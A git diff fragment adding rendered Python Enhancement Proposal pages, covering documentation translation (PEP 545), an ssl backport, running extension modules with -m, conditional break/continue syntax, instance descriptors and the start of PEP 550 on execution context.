Most of the translation work is actually done on Transifex [15].

+

Other tools may be used later like https://pontoon.mozilla.org/ +and http://zanata.org/.

+
+
+

Documentation Contribution Agreement

+

Documentation does require a license from the translator, as it +involves creativity in the expression of the ideas.

+

There’s multiple solutions, quoting Van Lindberg from the PSF asked +about the subject:

+
+
    +
  1. Docs should either have the copyright assigned or be under CCO. A +permissive software license (like Apache or MIT) would also get the +job done, although it is not quite fit for task.
  2. +
  3. The translators should either sign an agreement or submit a +declaration of the license with the translation.
  4. +
  5. We should have in the project page an invitation for people to +contribute under a defined license, with acceptance defined by their +act of contribution. Such as:
  6. +
+

“By posting this project on Transifex and inviting you to +participate, we are proposing an agreement that you will provide +your translation for the PSF’s use under the CC0 license. In return, +you may noted that you were the translator for the portion you +translate. You signify acceptance of this agreement by submitting +your work to the PSF for inclusion in the documentation.”

+
+

It looks like having a “Documentation Contribution Agreement” +is the most simple thing we can do as we can use multiple ways (GitHub +bots, invitation page, …) in different context to ensure contributors +are agreeing with it.

+
+
+

Language Team

+

Each language team should have one coordinator responsible for:

+
    +
  • Managing the team.
  • +
  • Choosing and managing the tools the team will use (chat, mailing list, …).
  • +
  • Ensure contributors understand and agree with the documentation +contribution agreement.
  • +
  • Ensure quality (grammar, vocabulary, consistency, filtering spam, ads, …).
  • +
  • Redirect issues posted on b.p.o to the correct GitHub issue tracker +for the language.
  • +
+
+
+
+

Alternatives

+
+

Simplified English

+

It would be possible to introduce a “simplified English” version like +Wikipedia did [10], as discussed on python-dev [11], targeting +English learners and children.

+

Pros: It yields a single translation, theoretically readable by +everyone and reviewable by current maintainers.

+

Cons: Subtle details may be lost, and translators from English to English +may be hard to find as stated by Wikipedia:

+

> The main English Wikipedia has 5 million articles, written by nearly +140K active users; the Swedish Wikipedia is almost as big, 3M articles +from only 3K active users; but the Simple English Wikipedia has just +123K articles and 871 active users. That’s fewer articles than +Esperanto!

+
+
+
+
+

Changes

+
+

Get a Documentation Contribution Agreement

+

The Documentation Contribution Agreement have to be written by the +PSF, then listed at https://www.python.org/psf/contrib/ and have its +own page like https://www.python.org/psf/contrib/doc-contrib-form/.

+
+
+

Migrate GitHub Repositories

+

We (authors of this PEP) already own French and Japanese Git repositories, +so moving them to the Python documentation organization will not be a +problem. We’ll however be following the New Translation Procedure.

+
+
+

Setup a GitHub bot for Documentation Contribution Agreement

+

To help ensuring contributors from GitHub have signed the +Documentation Contribution Agreement, We can setup the “The Knights +Who Say Ni” GitHub bot customized for this agreement on the migrated +repositories [28].

+
+
+

Patch docsbuild-scripts to Compile Translations

+

Docsbuild-script must be patched to:

+
    +
  • List the language tags to build along with the branches to build.
  • +
  • List the language tags to display in the language switcher.
  • +
  • Find translation repositories by formatting +github.com:python/python-docs-{language_tag}.git (See +Repository for Po Files)
  • +
  • Build translations for each branch and each language.
  • +
+

Patched docsbuild-scripts must only open .po files from +translation repositories.

+
+
+

List coordinators in the devguide

+

Add a page or a section with an empty list of coordinators to the +devguide, each new coordinator will be added to this list.

+
+
+

Create sphinx-doc Language Switcher

+

Highly similar to the version switcher, a language switcher must be +implemented. This language switcher must be configurable to hide or +show a given language.

+

The language switcher will only have to update or add the language +segment to the path like the current version switcher does. Unlike +the version switcher, no preflight are required as destination page +always exists (translations does not add or remove pages). +Untranslated (but existing) pages still exists, they should however be +rendered as so, see Enhance Rendering of Untranslated and Fuzzy +Translations.

+
+
+

Update sphinx-doc Version Switcher

+

The patch_url function of the version switcher in +version_switch.js have to be updated to understand and allow the +presence of the language segment in the path.

+
+
+

Enhance Rendering of Untranslated and Fuzzy Translations

+

It’s an opened sphinx issue [9], but we’ll need it so we’ll have to +work on it. Translated, fuzzy, and untranslated paragraphs should be +differentiated. (Fuzzy paragraphs have to warn the reader what he’s +reading may be out of date.)

+
+
+
+

New Translation Procedure

+
+

Designate a Coordinator

+

The first step is to designate a coordinator, see Language Team, +The coordinator must sign the CLA.

+

The coordinator should be added to the list of translation coordinators +on the devguide.

+
+
+

Create GitHub Repository

+

Create a repository named “python-docs-{LANGUAGE_TAG}” (IETF language +tag, without redundant region subtag, with a dash, and lowercased.) on +the Python GitHub organization (See Repository For Po Files.), and +grant the language coordinator push rights to this repository.

+
+
+

Setup the Documentation Contribution Agreement

+

The README file should clearly show the following Documentation +Contribution Agreement:

+
NOTE REGARDING THE LICENSE FOR TRANSLATIONS: Python's documentation is
+maintained using a global network of volunteers. By posting this
+project on Transifex, GitHub, and other public places, and inviting
+you to participate, we are proposing an agreement that you will
+provide your improvements to Python's documentation or the translation
+of Python's documentation for the PSF's use under the CC0 license
+(available at
+`https://creativecommons.org/publicdomain/zero/1.0/legalcode`_). In
+return, you may publicly claim credit for the portion of the
+translation you contributed and if your translation is accepted by the
+PSF, you may (but are not required to) submit a patch including an
+appropriate annotation in the Misc/ACKS or TRANSLATORS file. Although
+nothing in this Documentation Contribution Agreement obligates the PSF
+to incorporate your textual contribution, your participation in the
+Python community is welcomed and appreciated.
+
+You signify acceptance of this agreement by submitting your work to
+the PSF for inclusion in the documentation.
+
+
+
+
+

Add support for translations in docsbuild-scripts

+

As soon as the translation hits its first commits, update the +docsbuild-scripts configuration to build the translation (but not +displaying it in the language switcher).

+
+
+

Add Translation to the Language Switcher

+

As soon as the translation hits:

+
    +
  • 100% of bugs.html with proper links to the language repository +issue tracker.
  • +
  • 100% of tutorial.
  • +
  • 100% of library/functions (builtins).
  • +
+

the translation can be added to the language switcher.

+
+
+
+

Previous Discussions

+

[Python-ideas] Cross link documentation translations (January, 2016)

+

[Python-Dev] Translated Python documentation (February 2016)

+

[Python-ideas] https://docs.python.org/fr/ ? (March 2016)

+
+
+

References

+ +

[2] [Doc-SIG] Localization of Python docs + (https://mail.python.org/pipermail/doc-sig/2013-September/003948.html)

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0545.rst

+

Last modified: 2024-10-29 09:04:22 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0546/index.html b/pep-0546/index.html new file mode 100644 index 00000000000..ecc037ccac5 --- /dev/null +++ b/pep-0546/index.html @@ -0,0 +1,305 @@ + + + + + + + + PEP 546 – Backport ssl.MemoryBIO and ssl.SSLObject to Python 2.7 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 546 – Backport ssl.MemoryBIO and ssl.SSLObject to Python 2.7

+
+
Author:
+
Victor Stinner <vstinner at python.org>, +Cory Benfield <cory at lukasa.co.uk>
+
BDFL-Delegate:
+
Benjamin Peterson <benjamin at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
30-May-2017
+
Python-Version:
+
2.7
+
Post-History:
+
23-May-2017
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Backport the ssl.MemoryBIO and ssl.SSLObject classes from Python 3 to Python +2.7 to enhance the overall security of Python 2.7.

+
+
+

Rejection Notice

+

This PEP is rejected, see Withdraw PEP 546? Backport ssl.MemoryBIO and +ssl.SSLObject to Python 2.7 +discussion for the rationale.

+
+
+

Rationale

+

While Python 2.7 is getting closer to its end-of-support date (scheduled for +2020), it is still used on production systems and the Python community is still +responsible for its security. This PEP will help facilitate the future adoption +of PEP 543 across all supported Python versions, which will improve security +for both Python 2 and Python 3 users.

+

This PEP does NOT propose a general exception for backporting new +features to Python 2.7 - every new feature proposed for backporting will +still need to be justified independently. In particular, it will need to +be explained why relying on an independently updated backport on the +Python Package Index instead is not an acceptable solution.

+
+

PEP 543

+

PEP 543 defines a new TLS API for Python which would enhance Python +security by giving Python applications access to the native TLS implementations +on Windows and macOS, instead of using OpenSSL. A side effect is that it gives +access to the system trust store and certificates installed +locally by system administrators, enabling Python applications to use “company +certificates” without having to modify each application and so to correctly +validate TLS certificates (instead of having to ignore or bypass TLS +certificate validation).

+

For practical reasons, Cory Benfield would like to first implement an +I/O-less class similar to ssl.MemoryBIO and ssl.SSLObject for +PEP 543, and to provide a second class based on the first one to use +sockets or file descriptors. This design would help to structure the code +to support more backends and simplify testing and auditing, as well as +implementation. Later, optimized classes using directly sockets or file +descriptors may be added for performance.

+

While PEP 543 defines an API, the PEP would only make sense if it +comes with at least one complete and good implementation. The first +implementation would ideally be based on the ssl module of the Python +standard library, as this is shipped to all users by default and can be used as +a fallback implementation in the absence of anything more targeted.

+

If this backport is not performed, the only baseline implementation that could +be used would be pyOpenSSL. This is problematic, however, because of the +interaction with pip, which is shipped with CPython on all supported versions.

+
+
+

requests, pip and ensurepip

+

There are plans afoot to look at moving Requests to a more event-loop-y +model. The Requests team does not feel at this time it is possible to abandon +support for Python 2.7, so doing so would require using either Twisted or +Tornado, or writing their own asynchronous abstraction.

+

For asynchronous code, a MemoryBIO provides substantial advantages over using a +wrapped socket. It reduces the amount of buffering that must be done, works on +IOCP-based reactors as well as select/poll based ones, and also greatly +simplifies the reactor and implementation code. For this reason, Requests is +disinclined to use a wrapped-socket-based implementation. In the absence of a +backport to Python 2.7, Requests is required to use the same solution that +Twisted does: namely, a mandatory dependency on pyOpenSSL.

+

The pip program has to embed all its +dependencies for practical reasons: namely, that it cannot rely on any other +installation method being present. Since pip depends on requests, it means +that it would have to embed a copy of pyOpenSSL. That would imply substantial +usability pain to install pip. Currently, pip doesn’t support embedding +C extensions which must be compiled on each platform and so require a C +compiler.

+

Since Python 2.7.9, Python embeds a copy of pip both for default +installation and for use in virtual environments via the new ensurepip +module. If pip ends up bundling PyOpenSSL, then CPython will end up +bundling PyOpenSSL. Only backporting ssl.MemoryBIO and +ssl.SSLObject would avoid the need to embed pyOpenSSL, and would fix the +bootstrap issue (python -> ensurepip -> pip -> requests -> MemoryBIO).

+

This situation is less problematic than the barrier to adoption of PEP 543, as +naturally Requests does not have to move to an event loop model before it drops +support for Python 2.7. However, it does make it painful for Requests (and pip) +to embrace both asyncio and the async and await keywords for as long as +it continues to support Python 2.

+
+
+

Other Benefits

+

Adopting this PEP would have other smaller ecosystem benefits. For example, +Twisted would be able to reduce its dependency on third-party C extensions. +Additionally, the PyOpenSSL development team would like to sunset the module, +and this backport would free them up to do so in a graceful manner without +leaving their users in the lurch.

+

Each of these fringe benefits, while small, also provides value to the wider +Python ecosystem.

+
+
+
+

Concerns

+

There are some concerns that people have about this backport.

+
+

What About Old Python 2?

+

A number of the Python 2 users in the world are not keeping pace with Python 2 +releases. This is most usually because they are using LTS releases that are not +keeping pace with the minor releases of Python 2. These users would not be able +to use the MemoryBIO, and so projects concerned with Python 2 compatibility may +be unable to rely on the MemoryBIO being present on most of their user’s +systems.

+

This concern is reasonable. How critical it is depends on the likelihood of +current users of Python 2 migrating to Python 3, or just trying to use the most +recent Python 2 release. Put another way, at some point libraries will want to +drop Python 2 support: the question is only whether a significant majority of +their Python 2 users have moved to whatever Python 2 release contains this +backport before they do so.

+

Ultimately, the authors of this PEP believe that the burden of this backport is +sufficiently minimal to justify backporting despite this concern. If it turns +out that migration to newer 2.7 releases is too slow, then the value of the +work will be minimal, but if the migration to newer 2.7 releases is anything +like reasonable then there will be substantial value gained.

+
+
+
+

Changes

+

Add MemoryBIO and SSLObject classes to the ssl module of +Python 2.7.

+

The code will be backported and adapted from the master branch +(Python 3).

+

The backport also significantly reduced the size of the Python 2/Python +3 difference of the _ssl module, which make maintenance easier.

+
+ +
+

Discussions

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0546.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0547/index.html b/pep-0547/index.html new file mode 100644 index 00000000000..5d902c84647 --- /dev/null +++ b/pep-0547/index.html @@ -0,0 +1,296 @@ + + + + + + + + PEP 547 – Running extension modules using the -m option | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 547 – Running extension modules using the -m option

+
+
Author:
+
Marcel Plch <gmarcel.plch at gmail.com>, +Petr Viktorin <encukou at gmail.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
25-May-2017
+
Python-Version:
+
3.7
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Deferral Notice

+

Cython – the most important use case for this PEP and the only explicit +one – is not ready for multi-phase initialization yet. +It keeps global state in C-level static variables. +See discussion at Cython issue 1923.

+

The PEP is deferred until the situation changes.

+
+
+

Abstract

+

This PEP proposes implementation that allows built-in and extension +modules to be executed in the __main__ namespace using +the PEP 489 multi-phase initialization.

+

With this, a multi-phase initialization enabled module can be run +using following command:

+
$ python3 -m _testmultiphase
+This is a test module named __main__.
+
+
+
+
+

Motivation

+

Currently, extension modules do not support all functionality of +Python source modules. +Specifically, it is not possible to run extension modules as scripts using +Python’s -m option.

+

The technical groundwork to make this possible has been done for PEP 489, +and enabling the -m option is listed in that PEP’s +“Possible Future Extensions” section. +Technically, the additional changes proposed here are relatively small.

+
+
+

Rationale

+

Extension modules’ lack of support for the -m option has traditionally +been worked around by providing a Python wrapper. +For example, the _pickle module’s command line interface is in the +pure-Python pickle module (along with a pure-Python reimplementation).

+

This works well for standard library modules, as building command line +interfaces using the C API is cumbersome. +However, other users may want to create executable extension modules directly.

+

An important use case is Cython, a Python-like language that compiles to +C extension modules. +Cython is a (near) superset of Python, meaning that compiling a Python module +with Cython will typically not change the module’s functionality, allowing +Cython-specific features to be added gradually. +This PEP will allow Cython extension modules to behave the same as their Python +counterparts when run using the -m option. +Cython developers consider the feature worth implementing (see +Cython issue 1715).

+
+
+

Background

+

Python’s -m option is handled by the function +runpy._run_module_as_main.

+

The module specified by -m is not imported normally. +Instead, it is executed in the namespace of the __main__ module, +which is created quite early in interpreter initialization.

+

For Python source modules, running in another module’s namespace is not +a problem: the code is executed with locals and globals set to the +existing module’s __dict__. +This is not the case for extension modules, whose PyInit_* entry point +traditionally both created a new module object (using PyModule_Create), +and initialized it.

+

Since Python 3.5, extension modules can use PEP 489 multi-phase initialization. +In this scenario, the PyInit_* entry point returns a PyModuleDef +structure: a description of how the module should be created and initialized. +The extension can choose to customize creation of the module object using +the Py_mod_create callback, or opt to use a normal module object by not +specifying Py_mod_create. +Another callback, Py_mod_exec, is then called to initialize the module +object, e.g. by populating it with methods and classes.

+
+
+

Proposal

+

Multi-phase initialization makes it possible to execute an extension module in +another module’s namespace: if a Py_mod_create callback is not specified, +the __main__ module can be passed to the Py_mod_exec callback to be +initialized, as if __main__ was a freshly constructed module object.

+

One complication in this scheme is C-level module state. +Each module has a md_state pointer that points to a region of memory +allocated when an extension module is created. +The PyModuleDef specifies how much memory is to be allocated.

+

The implementation must take care that md_state memory is allocated at most +once. +Also, the Py_mod_exec callback should only be called once per module. +The implications of multiply-initialized modules are too subtle to require +expecting extension authors to reason about them. +The md_state pointer itself will serve as a guard: allocating the memory +and calling Py_mod_exec will always be done together, and initializing an +extension module will fail if md_state is already non-NULL.

+

Since the __main__ module is not created as an extension module, +its md_state is normally NULL. +Before initializing an extension module in __main__’s context, its module +state will be allocated according to the PyModuleDef of that module.

+

While PEP 489 was designed to make these changes generally possible, +it’s necessary to decouple module discovery, creation, and initialization +steps for extension modules, so that another module can be used instead of +a newly initialized one, and the functionality needs to be added to +runpy and importlib.

+
+
+

Specification

+

A new optional method for importlib loaders will be added. +This method will be called exec_in_module and will take two +positional arguments: module spec and an already existing module. +Any import-related attributes, such as __spec__ or __name__, +already set on the module will be ignored.

+

The runpy._run_module_as_main function will look for this new +loader method. +If it is present, runpy will execute it instead of trying to load and +run the module’s Python code. +Otherwise, runpy will act as before.

+
+

ExtensionFileLoader Changes

+

importlib’s ExtensionFileLoader will get an implementation of +exec_in_module that will call a new function, _imp.exec_in_module.

+

_imp.exec_in_module will use existing machinery to find and call an +extension module’s PyInit_* function.

+

The PyInit_* function can return either a fully initialized module +(single-phase initialization) or a PyModuleDef (for PEP 489 multi-phase +initialization).

+

In the single-phase initialization case, _imp.exec_in_module will raise +ImportError.

+

In the multi-phase initialization case, the PyModuleDef and the module to +be initialized will be passed to a new function, PyModule_ExecInModule.

+

This function raises ImportError if the PyModuleDef specifies +a Py_mod_create slot, or if the module has already been initialized +(i.e. its md_state pointer is not NULL). +Otherwise, the function will initialize the module according to the +PyModuleDef.

+
+
+
+

Backwards Compatibility

+

This PEP maintains backwards compatibility. +It only adds new functions, and a new loader method that is added for +a loader that previously did not support running modules as __main__.

+
+
+

Reference Implementation

+

The reference implementation of this PEP is available at GitHub.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0547.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0548/index.html b/pep-0548/index.html new file mode 100644 index 00000000000..a5cd9b68966 --- /dev/null +++ b/pep-0548/index.html @@ -0,0 +1,385 @@ + + + + + + + + PEP 548 – More Flexible Loop Control | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 548 – More Flexible Loop Control

+
+
Author:
+
R David Murray
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
05-Sep-2017
+
Python-Version:
+
3.7
+
Post-History:
+
05-Aug-2017
+
+
+
+
Table of Contents +
+
+

Rejection Note

+

Rejection by Guido: +https://mail.python.org/pipermail/python-dev/2017-September/149232.html

+
+
+

Abstract

+

This PEP proposes enhancing the break and continue statements +with an optional boolean expression that controls whether or not +they execute. This allows the flow of control in loops to be +expressed more clearly and compactly.

+
+
+

Motivation

+

Quoting from the rejected PEP 315:

+
+
It is often necessary for some code to be executed before each +evaluation of the while loop condition. This code is often +duplicated outside the loop, as setup code that executes once +before entering the loop:
<setup code>
+while <condition>:
+    <loop body>
+    <setup code>
+
+
+
+

That PEP was rejected because no syntax was found that was superior +to the following form:

+
while True:
+    <setup code>
+    if not <condition>:
+        break
+    <loop body>
+
+
+

This PEP proposes a superior form, one that also has application to +for loops. It is superior because it makes the flow of control in +loops more explicit, while preserving Python’s indentation aesthetic.

+
+
+

Syntax

+

The syntax of the break and continue statements are extended +as follows:

+
break_stmt : "break" ["if" expression]
+continue_stmt : "continue" ["if" expression]
+
+
+

In addition, the syntax of the while statement is modified as follows:

+
while_stmt : while1_stmt|while2_stmt
+while1_stmt : "while" expression ":" suite
+              ["else" ":" suite]
+while2_stmt : "while" ":" suite
+
+
+
+
+

Semantics

+

A break if or continue if is executed if and only if +expression evaluates to true.

+

A while statement with no expression loops until a break or return +is executed (or an error is raised), as if it were a while True +statement. Given that the loop can never terminate except in a +way that would not cause an else suite to execute, no else +suite is allowed in the expressionless form. If practical, it +should also be an error if the body of an expressionless while +does not contain at least one break or return statement.

+
+
+

Justification and Examples

+

The previous “best possible” form:

+
while True:
+    <setup code>
+    if not <condition>:
+        break
+    <loop body>
+
+
+

could be formatted as:

+
while True:
+    <setup code>
+    if not <condition>: break
+    <loop body>
+
+
+

This is superficially almost identical to the form proposed by this +PEP:

+
while:
+    <setup code>
+    break if not <condition>
+    <loop body>
+
+
+

The significant difference here is that the loop flow control +keyword appears first in the line of code. This makes it easier +to comprehend the flow of control in the loop at a glance, especially +when reading colorized code.

+

For example, this is a common code pattern, taken in this case +from the tarfile module:

+
while True:
+    buf = self._read(self.bufsize)
+    if not buf:
+        break
+    t.append(buf)
+
+
+

Reading this, we either see the break and possibly need to think about +where the while is that it applies to, since the break is indented +under the if, and then track backward to read the condition that +triggers it; or, we read the condition and only afterward discover +that this condition changes the flow of the loop.

+

With the new syntax this becomes:

+
while:
+    buf = self._read(self.bufsize)
+    break if not buf
+    t.append(buf)
+
+
+

Reading this we first see the break, which obviously applies to +the while since it is at the same level of indentation as the loop +body, and then we read the condition that causes the flow of control +to change.

+

Further, consider a more complex example from sre_parse:

+
while True:
+    c = self.next
+    self.__next()
+    if c is None:
+        if not result:
+            raise self.error("missing group name")
+        raise self.error("missing %s, unterminated name" % terminator,
+                         len(result))
+    if c == terminator:
+        if not result:
+            raise self.error("missing group name", 1)
+        break
+    result += c
+return result
+
+
+

This is the natural way to write this code given current Python +loop control syntax. However, given break if, it would be more +natural to write this as follows:

+
while:
+    c = self.next
+    self.__next()
+    break if c is None or c == terminator
+    result += c
+if not result:
+    raise self.error("missing group name")
+elif c is None:
+    raise self.error("missing %s, unterminated name" % terminator,
+                     len(result))
+return result
+
+
+

This form moves the error handling out of the loop body, leaving the +loop logic much more understandable. While it would certainly be +possible to write the code this way using the current syntax, the +proposed syntax makes it more natural to write it in the clearer form.

+

The proposed syntax also provides a natural, Pythonic spelling of +the classic repeat ... until <expression> construct found in +other languages, and for which no good syntax has previously been +found for Python:

+
while:
+    ...
+    break if <expression>
+
+
+

The tarfile module, for example, has a couple of “read until” loops like +the following:

+
while True:
+    s = self.__read(1)
+    if not s or s == NUL:
+        break
+
+
+

With the new syntax this would read more clearly:

+
while:
+    s = self.__read(1)
+    break if not s or s == NUL
+
+
+

The case for extending this syntax to continue is less strong, +but buttressed by the value of consistency.

+

It is much more common for a continue statement to be at the +end of a multiline if suite, such as this example from zipfile

+
while True:
+    try:
+        self.fp = io.open(file, filemode)
+    except OSError:
+        if filemode in modeDict:
+            filemode = modeDict[filemode]
+            continue
+        raise
+    break
+
+
+

The only opportunity for improvement the new syntax would offer for +this loop would be the omission of the True token.

+

On the other hand, consider this example from uuid.py:

+
for i in range(adapters.length):
+    ncb.Reset()
+    ncb.Command = netbios.NCBRESET
+    ncb.Lana_num = ord(adapters.lana[i])
+    if win32wnet.Netbios(ncb) != 0:
+        continue
+    ncb.Reset()
+    ncb.Command = netbios.NCBASTAT
+    ncb.Lana_num = ord(adapters.lana[i])
+    ncb.Callname = '*'.ljust(16)
+    ncb.Buffer = status = netbios.ADAPTER_STATUS()
+    if win32wnet.Netbios(ncb) != 0:
+        continue
+    status._unpack()
+    bytes = status.adapter_address[:6]
+    if len(bytes) != 6:
+        continue
+    return int.from_bytes(bytes, 'big')
+
+
+

This becomes:

+
for i in range(adapters.length):
+    ncb.Reset()
+    ncb.Command = netbios.NCBRESET
+    ncb.Lana_num = ord(adapters.lana[i])
+    continue if win32wnet.Netbios(ncb) != 0
+    ncb.Reset()
+    ncb.Command = netbios.NCBASTAT
+    ncb.Lana_num = ord(adapters.lana[i])
+    ncb.Callname = '*'.ljust(16)
+    ncb.Buffer = status = netbios.ADAPTER_STATUS()
+    continue if win32wnet.Netbios(ncb) != 0
+    status._unpack()
+    bytes = status.adapter_address[:6]
+    continue if len(bytes) != 6
+    return int.from_bytes(bytes, 'big')
+
+
+

This example indicates that there are non-trivial use cases where +continue if also improves the readability of the loop code.

+

It is probably significant to note that all of the examples selected +for this PEP were found by grepping the standard library for while +True and continue, and the relevant examples were found in +the first four modules inspected.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0548.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0549/index.html b/pep-0549/index.html new file mode 100644 index 00000000000..1dc00686421 --- /dev/null +++ b/pep-0549/index.html @@ -0,0 +1,258 @@ + + + + + + + + PEP 549 – Instance Descriptors | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 549 – Instance Descriptors

+
+
Author:
+
Larry Hastings <larry at hastings.org>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
04-Sep-2017
+
Python-Version:
+
3.7
+
Post-History:
+
04-Sep-2017
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

https://mail.python.org/pipermail/python-dev/2017-November/150528.html

+
+
+

Abstract

+

Python’s descriptor protocol requires that descriptors +be members of the type of an object. This PEP proposes +an extension to the descriptor protocol allowing use of +the descriptor protocol for members of instances. This +would permit using properties in modules.

+
+
+

Rationale

+

Python’s descriptor protocol guides programmers towards +elegant API design. If your class supports a data-like +member, and you might someday need to run code when +changing the member’s value, you’re encouraged to +simply declare it as a simple data member of the class +for now. If in the future you do need to run code, you +can change it to a “property”, and happily the API doesn’t +change.

+

But consider this second bit of best-practice Python API design: +if you’re writing a singleton, don’t write a class, just build +your code directly into a module. Don’t make your users +instantiate a singleton class, don’t make your users have to +dereference through a singleton object stored in a module, +just have module-level functions and module-level data.

+

Unfortunately these two best practices are in opposition. +The problem is that properties aren’t supported on modules. +Modules are instances of a single generic module type, +and it’s not feasible to modify or subclass this type to add +a property to one’s module. This means that programmers +facing this API design decision, where the data-like member +is a singleton stored in a module, must preemptively add +ugly “getters” and “setters” for the data.

+

Adding support for module properties in pure Python has recently +become possible; +as of Python 3.5, Python permits assigning to the __class__ +attribute of module objects, specifically for this purpose. Here’s +an example of using this functionality to add a property to a module:

+
import sys, types
+class _MyModuleType(types.ModuleType):
+    @property
+    def prop(self, instance, owner):
+        ...
+
+sys.modules[__name__].__class__ = _MyModuleType
+
+
+

This works, and is supported behavior, but it’s clumsy and obscure.

+

This PEP proposes a per-type opt-in extension to the descriptor +protocol specifically designed to enable properties in modules. +The mechanism is a way to honor the descriptor protocol for +members of instances of a class without the member being declared +as a class variable.

+

Although this is being proposed as a general mechanism, the author +currently only foresees this as being useful for module objects.

+
+
+

Implementation

+

The basic idea is simple: modify the tp_descr_get and tp_descr_set +functions exposed by PyModule_Type to inspect the attribute interacted +with, and if it supports the descriptor protocol, call the relevant +exposed function.

+

Our implementation faces two challenges:

+
    +
  1. Since this code will be run every time an attribute is looked up on a +method, it needs to add very little overhead in the general case, +where the object stored in the attribute is not a descriptor.
  2. +
  3. Since functions are descriptors, we must take care to not honor +the descriptor protocol for all objects. Otherwise, all module-level +functions will suddenly become bound to the module instance as if +they were method calls on the module object. The module handle would +be passed in as a “self” argument to all module-level functions.
  4. +
+

Both challenges can be solved with the same approach: we define a new +“fast subclass” flag that means “This object is a descriptor, and it +should be honored directly when this object is looked up as an +attribute of an instance”. So far this flag is only set on two +types: property and collections.abc.InstanceDescriptor. +The latter is an abstract base class, whose only purpose is +to allow user classes to inherit this “fast subclass” flag.

+
+
+

Prototype

+

A prototype of this functionality is under development +at GitHub [github].

+
+
+

Acknowledgements

+

Armin Rigo essentially proposed this mechanism when presented +with the idea of “module properties”, and educated the author +both on the complexities of the problem and the proper solution. +Nathaniel J. Smith pointed out the 3.5 extension about assigning +to __class__ on module objects, and provided the example.

+
+
+

References

+
+
+
[github]
+
+
The branch is here:
https://github.com/larryhastings/cpython/tree/module-properties
+
A pull request against the main CPython repo is here:
https://github.com/python/cpython/pull/3534
+
+
+
+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0549.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0550/index.html b/pep-0550/index.html new file mode 100644 index 00000000000..cb795d615c9 --- /dev/null +++ b/pep-0550/index.html @@ -0,0 +1,1838 @@ + + + + + + + + PEP 550 – Execution Context | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 550 – Execution Context

+
+
Author:
+
Yury Selivanov <yury at edgedb.com>, +Elvis Pranskevichus <elvis at edgedb.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
11-Aug-2017
+
Python-Version:
+
3.7
+
Post-History:
+
11-Aug-2017, 15-Aug-2017, 18-Aug-2017, 25-Aug-2017, +01-Sep-2017
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP adds a new generic mechanism of ensuring consistent access +to non-local state in the context of out-of-order execution, such +as in Python generators and coroutines.

+

Thread-local storage, such as threading.local(), is inadequate for +programs that execute concurrently in the same OS thread. This PEP +proposes a solution to this problem.

+
+
+

PEP Status

+

Due to its breadth and the lack of general consensus on some aspects, this +PEP has been withdrawn and superseded by a simpler PEP 567, which has +been accepted and included in Python 3.7.

+

PEP 567 implements the same core idea, but limits the ContextVar support +to asynchronous tasks while leaving the generator behavior untouched. +The latter may be revisited in a future PEP.

+
+
+

Rationale

+

Prior to the advent of asynchronous programming in Python, programs +used OS threads to achieve concurrency. The need for thread-specific +state was solved by threading.local() and its C-API equivalent, +PyThreadState_GetDict().

+

A few examples of where Thread-local storage (TLS) is commonly +relied upon:

+
    +
  • Context managers like decimal contexts, numpy.errstate, +and warnings.catch_warnings.
  • +
  • Request-related data, such as security tokens and request +data in web applications, language context for gettext etc.
  • +
  • Profiling, tracing, and logging in large code bases.
  • +
+

Unfortunately, TLS does not work well for programs which execute +concurrently in a single thread. A Python generator is the simplest +example of a concurrent program. Consider the following:

+
def fractions(precision, x, y):
+    with decimal.localcontext() as ctx:
+        ctx.prec = precision
+        yield Decimal(x) / Decimal(y)
+        yield Decimal(x) / Decimal(y ** 2)
+
+g1 = fractions(precision=2, x=1, y=3)
+g2 = fractions(precision=6, x=2, y=3)
+
+items = list(zip(g1, g2))
+
+
+

The intuitively expected value of items is:

+
[(Decimal('0.33'), Decimal('0.666667')),
+ (Decimal('0.11'), Decimal('0.222222'))]
+
+
+

Rather surprisingly, the actual result is:

+
[(Decimal('0.33'), Decimal('0.666667')),
+ (Decimal('0.111111'), Decimal('0.222222'))]
+
+
+

